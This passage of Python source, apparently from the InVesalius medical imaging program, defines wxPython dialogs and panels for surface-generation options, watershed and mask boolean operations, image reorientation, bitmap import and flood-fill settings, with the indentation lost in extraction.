wx.Panel.__init__(self, parent, -1)
self._build_widgets()
def _build_widgets(self):
sb = wx.StaticBox(self, -1, _('Options'))
self.angle = InvFloatSpinCtrl(self, -1, value=0.7, min_value=0.0,
max_value=1.0, increment=0.1,
digits=1)
self.max_distance = InvFloatSpinCtrl(self, -1, value=3.0, min_value=0.0,
max_value=100.0, increment=0.1,
digits=2)
self.min_weight = InvFloatSpinCtrl(self, -1, value=0.5, min_value=0.0,
max_value=1.0, increment=0.1,
digits=1)
self.steps = InvSpinCtrl(self, -1, value=10, min_value=1, max_value=100)
layout_sizer = wx.FlexGridSizer(rows=4, cols=2, hgap=5, vgap=5)
layout_sizer.Add(wx.StaticText(self, -1, _(u'Angle:')), 0, wx.EXPAND)
layout_sizer.Add(self.angle, 0, wx.EXPAND)
layout_sizer.Add(wx.StaticText(self, -1, _(u'Max. distance:')), 0, wx.EXPAND)
layout_sizer.Add(self.max_distance, 0, wx.EXPAND)
layout_sizer.Add(wx.StaticText(self, -1, _(u'Min. weight:')), 0, wx.EXPAND)
layout_sizer.Add(self.min_weight, 0, wx.EXPAND)
layout_sizer.Add(wx.StaticText(self, -1, _(u'N. steps:')), 0, wx.EXPAND)
layout_sizer.Add(self.steps, 0, wx.EXPAND)
self.main_sizer = wx.StaticBoxSizer(sb, wx.VERTICAL)
self.main_sizer.Add(layout_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(self.main_sizer)
class SurfaceMethodPanel(wx.Panel):
'''
This dialog is only shown when the mask whose surface will be generate was
edited. So far, the only options available are the choice of method to
generate the surface, Binary or `Context aware smoothing', and options from
`Context aware smoothing'
'''
def __init__(self, parent, id, mask_edited=False):
wx.Panel.__init__(self, parent, id)
self.mask_edited = mask_edited
self.alg_types = {_(u'Default'): 'Default',
_(u'Context aware smoothing'): 'ca_smoothing',
_(u'Binary'): 'Binary'}
self.edited_imp = [_(u'Default'), ]
self._build_widgets()
self._bind_wx()
def _build_widgets(self):
self.ca_options = CAOptions(self)
self.cb_types = wx.ComboBox(self, -1, _(u'Default'),
choices=[i for i in sorted(self.alg_types)
if not (self.mask_edited and i in self.edited_imp)],
style=wx.CB_READONLY)
w, h = self.cb_types.GetSize()
icon = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, wx.ART_MESSAGE_BOX,
(h * 0.8, h * 0.8))
self.bmp = wx.StaticBitmap(self, -1, icon)
self.bmp.SetToolTip(_("It is not possible to use the Default method because the mask was edited."))
self.method_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.method_sizer.Add(wx.StaticText(self, -1, _(u'Method:')), 0,
wx.EXPAND | wx.ALL, 5)
self.method_sizer.Add(self.cb_types, 1, wx.EXPAND)
self.method_sizer.Add(self.bmp, 0, wx.EXPAND|wx.ALL, 5)
self.main_sizer = wx.BoxSizer(wx.VERTICAL)
self.main_sizer.Add(self.method_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.main_sizer.Add(self.ca_options, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(self.main_sizer)
self.Layout()
self.Fit()
if self.mask_edited:
self.cb_types.SetValue(_(u'Context aware smoothing'))
self.ca_options.Enable()
self.method_sizer.Show(self.bmp)
else:
self.ca_options.Disable()
self.method_sizer.Hide(self.bmp)
def _bind_wx(self):
self.cb_types.Bind(wx.EVT_COMBOBOX, self._set_cb_types)
def _set_cb_types(self, evt):
if self.alg_types[evt.GetString()] == 'ca_smoothing':
self.ca_options.Enable()
else:
self.ca_options.Disable()
evt.Skip()
def GetAlgorithmSelected(self):
try:
return self.alg_types[self.cb_types.GetValue()]
except KeyError:
return self.alg_types[0]
def GetOptions(self):
if self.GetAlgorithmSelected() == 'ca_smoothing':
options = {'angle': self.ca_options.angle.GetValue(),
'max distance': self.ca_options.max_distance.GetValue(),
'min weight': self.ca_options.min_weight.GetValue(),
'steps': self.ca_options.steps.GetValue()}
else:
options = {}
return options
def GetValue(self):
algorithm = self.GetAlgorithmSelected()
options = self.GetOptions()
return {"algorithm": algorithm,
"options": options}
def ReloadMethodsOptions(self):
self.cb_types.Clear()
self.cb_types.AppendItems([i for i in sorted(self.alg_types)
if not (self.mask_edited and i in self.edited_imp)])
if self.mask_edited:
self.cb_types.SetValue(_(u'Context aware smoothing'))
self.ca_options.Enable()
self.method_sizer.Show(self.bmp)
else:
self.cb_types.SetValue(_(u'Default'))
self.ca_options.Disable()
self.method_sizer.Hide(self.bmp)
self.method_sizer.Layout()
class ClutImagedataDialog(wx.Dialog):
def __init__(self, histogram, init, end, nodes=None):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.histogram = histogram
self.init = init
self.end = end
self.nodes = nodes
self._init_gui()
self.bind_events()
self.bind_events_wx()
def _init_gui(self):
self.clut_widget = CLUTImageDataWidget(self, -1, self.histogram,
self.init, self.end, self.nodes)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.clut_widget, 1, wx.EXPAND)
self.SetSizer(sizer)
self.Fit()
def bind_events_wx(self):
self.clut_widget.Bind(EVT_CLUT_NODE_CHANGED, self.OnClutChange)
def bind_events(self):
Publisher.subscribe(self._refresh_widget, 'Update clut imagedata widget')
def OnClutChange(self, evt):
Publisher.sendMessage('Change colour table from background image from widget',
nodes=evt.GetNodes())
Publisher.sendMessage('Update window level text',
window=self.clut_widget.window_width,
level=self.clut_widget.window_level)
def _refresh_widget(self):
self.clut_widget.Refresh()
def Show(self, gen_evt=True, show=True):
super(wx.Dialog, self).Show(show)
if gen_evt:
self.clut_widget._generate_event()
class WatershedOptionsPanel(wx.Panel):
def __init__(self, parent, config):
wx.Panel.__init__(self, parent)
self.algorithms = ("Watershed", "Watershed IFT")
self.con2d_choices = (4, 8)
self.con3d_choices = (6, 18, 26)
self.config = config
self._init_gui()
def _init_gui(self):
self.choice_algorithm = wx.RadioBox(self, -1, _(u"Method"),
choices=self.algorithms,
style=wx.NO_BORDER | wx.HORIZONTAL)
self.choice_algorithm.SetSelection(self.algorithms.index(self.config.algorithm))
self.choice_2dcon = wx.RadioBox(self, -1, "2D",
choices=[str(i) for i in self.con2d_choices],
style=wx.NO_BORDER | wx.HORIZONTAL)
self.choice_2dcon.SetSelection(self.con2d_choices.index(self.config.con_2d))
self.choice_3dcon = wx.RadioBox(self, -1, "3D",
choices=[str(i) for i in self.con3d_choices],
style=wx.NO_BORDER | wx.HORIZONTAL)
self.choice_3dcon.SetSelection(self.con3d_choices.index(self.config.con_3d))
self.gaussian_size = InvSpinCtrl(self, -1, value=self.config.mg_size,
min_value=1, max_value=10)
box_sizer = wx.StaticBoxSizer(wx.StaticBox(self, -1, "Conectivity"), wx.VERTICAL)
box_sizer.Add(self.choice_2dcon, 0, wx.ALL, 5)
box_sizer.Add(self.choice_3dcon, 0, wx.ALL, 5)
g_sizer = wx.BoxSizer(wx.HORIZONTAL)
g_sizer.Add(wx.StaticText(self, -1, _("Gaussian sigma")), 0, wx.ALIGN_CENTER | wx.ALL, 5)
g_sizer.Add(self.gaussian_size, 0, wx.ALL, 5)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.choice_algorithm, 0, wx.ALL, 5)
sizer.Add(box_sizer, 1, wx.EXPAND | wx.ALL, 5)
sizer.Add(g_sizer, 0, wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
def apply_options(self):
self.config.algorithm = self.algorithms[self.choice_algorithm.GetSelection()]
self.config.con_2d = self.con2d_choices[self.choice_2dcon.GetSelection()]
self.config.con_3d = self.con3d_choices[self.choice_3dcon.GetSelection()]
self.config.mg_size = self.gaussian_size.GetValue()
class WatershedOptionsDialog(wx.Dialog):
def __init__(self, config, ID=-1, title=_(u'Watershed'), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
self.config = config
self._init_gui()
def _init_gui(self):
wop = WatershedOptionsPanel(self, self.config)
self.wop = wop
sizer = wx.BoxSizer(wx.VERTICAL)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
sizer.Add(wop, 0, wx.EXPAND)
sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT | wx.BOTTOM, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
self.CenterOnScreen()
def OnOk(self, evt):
self.wop.apply_options()
evt.Skip()
class MaskBooleanDialog(wx.Dialog):
def __init__(self, masks, ID=-1, title=_(u"Boolean operations"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
self._init_gui(masks)
self.CenterOnScreen()
def _init_gui(self, masks):
mask_choices = [(masks[i].name, masks[i]) for i in sorted(masks)]
self.mask1 = wx.ComboBox(self, -1, mask_choices[0][0], choices=[])
self.mask2 = wx.ComboBox(self, -1, mask_choices[0][0], choices=[])
for n, m in mask_choices:
self.mask1.Append(n, m)
self.mask2.Append(n, m)
self.mask1.SetSelection(0)
if len(mask_choices) > 1:
self.mask2.SetSelection(1)
else:
self.mask2.SetSelection(0)
icon_folder = inv_paths.ICON_DIR
op_choices = ((_(u"Union"), const.BOOLEAN_UNION, 'bool_union.png'),
(_(u"Difference"), const.BOOLEAN_DIFF, 'bool_difference.png'),
(_(u"Intersection"), const.BOOLEAN_AND, 'bool_intersection.png'),
(_(u"Exclusive disjunction"), const.BOOLEAN_XOR, 'bool_disjunction.png'))
self.op_boolean = BitmapComboBox(self, -1, op_choices[0][0], choices=[])
for n, i, f in op_choices:
bmp = wx.Bitmap(os.path.join(icon_folder, f), wx.BITMAP_TYPE_PNG)
self.op_boolean.Append(n, bmp, i)
self.op_boolean.SetSelection(0)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
gsizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5, vgap=5)
gsizer.Add(wx.StaticText(self, -1, _(u"Mask 1")), 0, wx.ALIGN_CENTER_VERTICAL)
gsizer.Add(self.mask1, 1, wx.EXPAND)
gsizer.Add(wx.StaticText(self, -1, _(u"Operation")), 0, wx.ALIGN_CENTER_VERTICAL)
gsizer.Add(self.op_boolean, 1, wx.EXPAND)
gsizer.Add(wx.StaticText(self, -1, _(u"Mask 2")), 0, wx.ALIGN_CENTER_VERTICAL)
gsizer.Add(self.mask2, 1, wx.EXPAND)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(gsizer, 0, wx.EXPAND | wx.ALL, border=5)
sizer.Add(btnsizer, 0, wx.EXPAND | wx.ALL, border=5)
self.SetSizer(sizer)
sizer.Fit(self)
btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
def OnOk(self, evt):
op = self.op_boolean.GetClientData(self.op_boolean.GetSelection())
m1 = self.mask1.GetClientData(self.mask1.GetSelection())
m2 = self.mask2.GetClientData(self.mask2.GetSelection())
Publisher.sendMessage('Do boolean operation',
operation=op, mask1=m1, mask2=m2)
Publisher.sendMessage('Reload actual slice')
Publisher.sendMessage('Refresh viewer')
self.Close()
self.Destroy()
class ReorientImageDialog(wx.Dialog):
def __init__(self, ID=-1, title=_(u'Image reorientation'), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
self._closed = False
self._last_ax = "0.0"
self._last_ay = "0.0"
self._last_az = "0.0"
self._init_gui()
self._bind_events()
self._bind_events_wx()
def _init_gui(self):
interp_methods_choices = ((_(u"Nearest Neighbour"), 0),
(_(u"Trilinear"), 1),
(_(u"Tricubic"), 2),
(_(u"Lanczos (experimental)"), 3))
self.interp_method = wx.ComboBox(self, -1, choices=[], style=wx.CB_READONLY)
for txt, im_code in interp_methods_choices:
self.interp_method.Append(txt, im_code)
self.interp_method.SetValue(interp_methods_choices[2][0])
self.anglex = wx.TextCtrl(self, -1, "0.0")
self.angley = wx.TextCtrl(self, -1, "0.0")
self.anglez = wx.TextCtrl(self, -1, "0.0")
self.btnapply = wx.Button(self, -1, _("Apply"))
sizer = wx.BoxSizer(wx.VERTICAL)
angles_sizer = wx.FlexGridSizer(3, 2, 5, 5)
angles_sizer.AddMany([
(wx.StaticText(self, -1, _("Angle X")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
(self.anglex, 0, wx.EXPAND | wx.ALL, 5),
(wx.StaticText(self, -1, _("Angle Y")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
(self.angley, 0, wx.EXPAND | wx.ALL, 5),
(wx.StaticText(self, -1, _("Angle Z")), 1, wx.ALIGN_CENTER_VERTICAL | wx.ALL, 5),
(self.anglez, 0, wx.EXPAND | wx.ALL, 5),
])
sizer.Add(wx.StaticText(self, -1, _("Interpolation method:")), 0, wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, 5)
sizer.Add(self.interp_method, 0, wx.EXPAND | wx.ALL, 5)
sizer.Add(angles_sizer, 0, wx.EXPAND | wx.ALL, 5)
sizer.Add(self.btnapply, 0, wx.EXPAND | wx.ALL, 5)
sizer.AddSpacer(5)
self.SetSizer(sizer)
self.Fit()
def _bind_events(self):
Publisher.subscribe(self._update_angles, 'Update reorient angles')
Publisher.subscribe(self._close_dialog, 'Close reorient dialog')
def _bind_events_wx(self):
self.interp_method.Bind(wx.EVT_COMBOBOX, self.OnSelect)
self.anglex.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)
self.angley.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)
self.anglez.Bind(wx.EVT_KILL_FOCUS, self.OnLostFocus)
self.anglex.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
self.angley.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
self.anglez.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
self.btnapply.Bind(wx.EVT_BUTTON, self.apply_reorientation)
self.Bind(wx.EVT_CLOSE, self.OnClose)
def _update_angles(self, angles):
anglex, angley, anglez = angles
self.anglex.SetValue("%.3f" % np.rad2deg(anglex))
self.angley.SetValue("%.3f" % np.rad2deg(angley))
self.anglez.SetValue("%.3f" % np.rad2deg(anglez))
def _close_dialog(self):
self.Destroy()
def apply_reorientation(self, evt):
Publisher.sendMessage('Apply reorientation')
self.Close()
def OnClose(self, evt):
self._closed = True
Publisher.sendMessage('Disable style', style=const.SLICE_STATE_REORIENT)
Publisher.sendMessage('Enable style', style=const.STATE_DEFAULT)
self.Destroy()
def OnSelect(self, evt):
im_code = self.interp_method.GetClientData(self.interp_method.GetSelection())
Publisher.sendMessage('Set interpolation method', interp_method=im_code)
def OnSetFocus(self, evt):
self._last_ax = self.anglex.GetValue()
self._last_ay = self.angley.GetValue()
self._last_az = self.anglez.GetValue()
def OnLostFocus(self, evt):
if not self._closed:
try:
ax = np.deg2rad(float(self.anglex.GetValue()))
ay = np.deg2rad(float(self.angley.GetValue()))
az = np.deg2rad(float(self.anglez.GetValue()))
except ValueError:
self.anglex.SetValue(self._last_ax)
self.angley.SetValue(self._last_ay)
self.anglez.SetValue(self._last_az)
return
Publisher.sendMessage('Set reorientation angles', angles=(ax, ay, az))
class ImportBitmapParameters(wx.Dialog):
from os import sys
def __init__(self):
if sys.platform == 'win32':
size=wx.Size(380,180)
else:
size=wx.Size(380,210)
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1,
_(u"Create project from bitmap"),
size=size,
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.interval = 0
self._init_gui()
self.bind_evts()
self.CenterOnScreen()
def _init_gui(self):
import invesalius.project as prj
p = wx.Panel(self, -1, style = wx.TAB_TRAVERSAL
| wx.CLIP_CHILDREN
| wx.FULL_REPAINT_ON_RESIZE)
gbs_principal = self.gbs = wx.GridBagSizer(4,1)
gbs = self.gbs = wx.GridBagSizer(5, 2)
flag_labels = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL
stx_name = wx.StaticText(p, -1, _(u"Project name:"))
tx_name = self.tx_name = wx.TextCtrl(p, -1, "InVesalius Bitmap", size=wx.Size(220,-1))
stx_orientation = wx.StaticText(p, -1, _(u"Slices orientation:"),)
cb_orientation_options = [_(u'Axial'), _(u'Coronal'), _(u'Sagital')]
cb_orientation = self.cb_orientation = wx.ComboBox(p, value="Axial", choices=cb_orientation_options,\
size=wx.Size(160,-1), style=wx.CB_DROPDOWN|wx.CB_READONLY)
stx_spacing = wx.StaticText(p, -1, _(u"Spacing (mm):"))
gbs.Add(stx_name, (0,0), flag=flag_labels)
gbs.Add(tx_name, (0,1))
try:
gbs.Add(0, 0, (1,0))
except TypeError:
gbs.AddStretchSpacer((1,0))
gbs.Add(stx_orientation, (2,0), flag=flag_labels)
gbs.Add(cb_orientation, (2,1))
gbs.Add(stx_spacing, (3,0))
try:
gbs.Add(0, 0, (4,0))
except TypeError:
gbs.AddStretchSpacer((4,0))
#--- spacing --------------
gbs_spacing = wx.GridBagSizer(2, 6)
stx_spacing_x = stx_spacing_x = wx.StaticText(p, -1, _(u"X:"))
fsp_spacing_x = self.fsp_spacing_x = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
stx_spacing_y = stx_spacing_y = wx.StaticText(p, -1, _(u"Y:"))
fsp_spacing_y = self.fsp_spacing_y = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
stx_spacing_z = stx_spacing_z = wx.StaticText(p, -1, _(u"Z:"))
fsp_spacing_z = self.fsp_spacing_z = InvFloatSpinCtrl(p, -1, min_value=0, max_value=1000000000,
increment=0.25, value=1.0, digits=8)
try:
proj = prj.Project()
sx = proj.spacing[0]
sy = proj.spacing[1]
sz = proj.spacing[2]
fsp_spacing_x.SetValue(sx)
fsp_spacing_y.SetValue(sy)
fsp_spacing_z.SetValue(sz)
except(AttributeError):
pass
gbs_spacing.Add(stx_spacing_x, (0,0), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_x, (0,1))
gbs_spacing.Add(stx_spacing_y, (0,2), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_y, (0,3))
gbs_spacing.Add(stx_spacing_z, (0,4), flag=flag_labels)
gbs_spacing.Add(fsp_spacing_z, (0,5))
#----- buttons ------------------------
gbs_button = wx.GridBagSizer(2, 4)
btn_ok = self.btn_ok= wx.Button(p, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(p, wx.ID_CANCEL)
try:
gbs_button.Add(0, 0, (0,2))
except TypeError:
gbs_button.AddStretchSpacer((0,2))
gbs_button.Add(btn_cancel, (1,2))
gbs_button.Add(btn_ok, (1,3))
gbs_principal.Add(gbs, (0,0), flag = wx.ALL|wx.EXPAND)
gbs_principal.Add(gbs_spacing, (1,0), flag=wx.ALL|wx.EXPAND)
try:
gbs_principal.Add(0, 0, (2,0))
except TypeError:
gbs_principal.AddStretchSpacer((2,0))
gbs_principal.Add(gbs_button, (3,0), flag = wx.ALIGN_RIGHT)
box = wx.BoxSizer()
box.Add(gbs_principal, 1, wx.ALL|wx.EXPAND, 10)
p.SetSizer(box)
box.Fit(self)
self.Layout()
def bind_evts(self):
self.btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
def SetInterval(self, v):
self.interval = v
def OnOk(self, evt):
orient_selection = self.cb_orientation.GetSelection()
if(orient_selection == 1):
orientation = u"CORONAL"
elif(orient_selection == 2):
orientation = u"SAGITTAL"
else:
orientation = u"AXIAL"
values = [self.tx_name.GetValue(), orientation,\
self.fsp_spacing_x.GetValue(), self.fsp_spacing_y.GetValue(),\
self.fsp_spacing_z.GetValue(), self.interval]
Publisher.sendMessage('Open bitmap files', rec_data=values)
self.Close()
self.Destroy()
def BitmapNotSameSize():
dlg = wx.MessageDialog(None,_("All bitmaps files must be the same \n width and height size."), 'Error',\
wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
class PanelTargeFFill(wx.Panel):
def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self._init_gui()
def _init_gui(self):
self.target_2d = wx.RadioButton(self, -1, _(u"2D - Actual slice"), style=wx.RB_GROUP)
self.target_3d = wx.RadioButton(self, -1, _(u"3D - All slices"))
sizer = wx.GridBagSizer(5, 5)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(self.target_2d, (1, 0), (1, 6), flag=wx.LEFT, border=5)
sizer.Add(self.target_3d, (2, 0), (1, 6), flag=wx.LEFT, border=5)
try:
sizer.Add(0, 0, (3, 0))
except TypeError:
sizer.AddStretchSpacer((3, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
class Panel2DConnectivity(wx.Panel):
def __init__(self, parent, ID=-1, show_orientation=False, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self._init_gui(show_orientation)
def _init_gui(self, show_orientation):
self.conect2D_4 = wx.RadioButton(self, -1, "4", style=wx.RB_GROUP)
self.conect2D_8 = wx.RadioButton(self, -1, "8")
sizer = wx.GridBagSizer(5, 5)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(wx.StaticText(self, -1, _(u"2D Connectivity")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
sizer.Add(self.conect2D_4, (2, 0), flag=wx.LEFT, border=7)
sizer.Add(self.conect2D_8, (2, 1), flag=wx.LEFT, border=7)
try:
sizer.Add(0, 0, (3, 0))
except TypeError:
sizer.AddStretchSpacer((3, 0))
if show_orientation:
self.cmb_orientation = wx.ComboBox(self, -1, choices=(_(u"Axial"), _(u"Coronal"), _(u"Sagital")), style=wx.CB_READONLY)
self.cmb_orientation.SetSelection(0)
sizer.Add(wx.StaticText(self, -1, _(u"Orientation")), (4, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
sizer.Add(self.cmb_orientation, (5, 0), (1, 10), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
try:
sizer.Add(0, 0, (6, 0))
except TypeError:
sizer.AddStretchSpacer((6, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
def GetConnSelected(self):
if self.conect2D_4.GetValue():
return 4
else:
return 8
def GetOrientation(self):
dic_ori = {
_(u"Axial"): 'AXIAL',
_(u"Coronal"): 'CORONAL',
_(u"Sagital"): 'SAGITAL'
}
return dic_ori[self.cmb_orientation.GetStringSelection()]
class Panel3DConnectivity(wx.Panel):
def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self._init_gui()
def _init_gui(self):
self.conect3D_6 = wx.RadioButton(self, -1, "6", style=wx.RB_GROUP)
self.conect3D_18 = wx.RadioButton(self, -1, "18")
self.conect3D_26 = wx.RadioButton(self, -1, "26")
sizer = wx.GridBagSizer(5, 5)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(wx.StaticText(self, -1, _(u"3D Connectivity")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
sizer.Add(self.conect3D_6, (2, 0), flag=wx.LEFT, border=9)
sizer.Add(self.conect3D_18, (2, 1), flag=wx.LEFT, border=9)
sizer.Add(self.conect3D_26, (2, 2), flag=wx.LEFT, border=9)
try:
sizer.Add(0, 0, (3, 0))
except TypeError:
sizer.AddStretchSpacer((3, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
def GetConnSelected(self):
if self.conect3D_6.GetValue():
return 6
elif self.conect3D_18.GetValue():
return 18
else:
return 26
class PanelFFillThreshold(wx.Panel):
def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self.config = config
self._init_gui()
def _init_gui(self):
import invesalius.project as prj
project = prj.Project()
bound_min, bound_max = project.threshold_range
colour = [i*255 for i in const.MASK_COLOUR[0]]
colour.append(100)
self.threshold = grad.GradientCtrl(self, -1, int(bound_min),
int(bound_max), self.config.t0,
self.config.t1, colour)
# sizer
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddSpacer(5)
sizer.Add(self.threshold, 0, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
sizer.AddSpacer(5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.Bind(grad.EVT_THRESHOLD_CHANGING, self.OnSlideChanged, self.threshold)
self.Bind(grad.EVT_THRESHOLD_CHANGED, self.OnSlideChanged, self.threshold)
def OnSlideChanged(self, evt):
self.config.t0 = int(self.threshold.GetMinValue())
self.config.t1 = int(self.threshold.GetMaxValue())
print(self.config.t0, self.config.t1)
class PanelFFillDynamic(wx.Panel):
def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self.config = config
self._init_gui()
def _init_gui(self):
self.use_ww_wl = wx.CheckBox(self, -1, _(u"Use WW&WL"))
self.use_ww_wl.SetValue(self.config.use_ww_wl)
self.deviation_min = InvSpinCtrl(self, -1, value=self.config.dev_min, min_value=0, max_value=10000)
self.deviation_min.CalcSizeFromTextSize()
self.deviation_max = InvSpinCtrl(self, -1, value=self.config.dev_max, min_value=0, max_value=10000)
self.deviation_max.CalcSizeFromTextSize()
sizer = wx.GridBagSizer(5, 5)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(self.use_ww_wl, (1, 0), (1, 6), flag=wx.LEFT, border=5)
try:
sizer.Add(0, 0, (2, 0))
except TypeError:
sizer.AddStretchSpacer((2, 0))
sizer.Add(wx.StaticText(self, -1, _(u"Deviation")), (3, 0), (1, 6), flag=wx.LEFT, border=5)
sizer.Add(wx.StaticText(self, -1, _(u"Min:")), (4, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=9)
sizer.Add(self.deviation_min, (4, 1))
sizer.Add(wx.StaticText(self, -1, _(u"Max:")), (4, 2), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=9)
sizer.Add(self.deviation_max, (4, 3))
try:
sizer.Add(0, 0, (5, 0))
except TypeError:
sizer.AddStretchSpacer((5, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.use_ww_wl.Bind(wx.EVT_CHECKBOX, self.OnSetUseWWWL)
self.deviation_min.Bind(wx.EVT_SPINCTRL, self.OnSetDeviation)
self.deviation_max.Bind(wx.EVT_SPINCTRL, self.OnSetDeviation)
def OnSetUseWWWL(self, evt):
self.config.use_ww_wl = self.use_ww_wl.GetValue()
def OnSetDeviation(self, evt):
self.config.dev_max = self.deviation_max.GetValue()
self.config.dev_min = self.deviation_min.GetValue()
class PanelFFillConfidence(wx.Panel):
def __init__(self, parent, config, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
wx.Panel.__init__(self, parent, ID, style=style)
self.config = config
self._init_gui()
def _init_gui(self):
self.use_ww_wl = wx.CheckBox(self, -1, _(u"Use WW&WL"))
self.use_ww_wl.SetValue(self.config.use_ww_wl)
self.spin_mult = InvFloatSpinCtrl(self, -1,
value=self.config.confid_mult,
min_value=1.0, max_value=10.0,
increment=0.1, digits=1)
# style=wx.TE_PROCESS_TAB|wx.TE_PROCESS_ENTER,
# agwStyle=floatspin.FS_RIGHT)
self.spin_mult.CalcSizeFromTextSize()
self.spin_iters = InvSpinCtrl(self, -1, value=self.config.confid_iters, min_value=0, max_value=100)
self.spin_iters.CalcSizeFromTextSize()
sizer = wx.GridBagSizer(5, 5)
try:
sizer.Add(0, 0, (0, 0))
except TypeError:
sizer.AddStretchSpacer((0, 0))
sizer.Add(self.use_ww_wl, (1, 0), (1, 6), flag=wx.LEFT, border=5)
try:
sizer.Add(0, 0, (2, 0))
except TypeError:
sizer.AddStretchSpacer((2, 0))
sizer.Add(wx.StaticText(self, -1, _(u"Multiplier")), (3, 0), (1, 3), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)
sizer.Add(self.spin_mult, (3, 3), (1, 3))
sizer.Add(wx.StaticText(self, -1, _(u"Iterations")), (4, 0), (1, 3), flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)
sizer.Add(self.spin_iters, (4, 3), (1, 2))
try:
sizer.Add(0, 0, (5, 0))
except TypeError:
sizer.AddStretchSpacer((5, 0))
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.use_ww_wl.Bind(wx.EVT_CHECKBOX, self.OnSetUseWWWL)
self.spin_mult.Bind(wx.EVT_SPINCTRL, self.OnSetMult)
self.spin_iters.Bind(wx.EVT_SPINCTRL, self.OnSetIters)
def OnSetUseWWWL(self, evt):
self.config.use_ww_wl = self.use_ww_wl.GetValue()
